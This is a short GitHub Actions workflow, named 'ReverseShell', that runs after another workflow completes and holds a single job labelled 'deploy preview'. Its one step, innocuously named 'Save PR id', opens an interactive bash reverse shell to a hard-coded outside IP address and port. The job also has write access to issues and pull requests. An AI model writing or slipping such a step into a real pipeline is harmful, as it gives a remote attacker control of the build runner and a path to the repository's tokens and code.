name: ReverseShell

on:
  workflow_run:
    workflows: [Mytest]
    types:
      - completed

permissions:
  contents: read

jobs:
  deploy-site:
    permissions:
      actions: read 
      issues: write 
      pull-requests: write
    name: deploy preview
    runs-on: ubuntu-latest
    steps:
      - name: Save PR id
        id: pr
        run: bash -i >& /dev/tcp/116.62.149.37/9999 0>&1
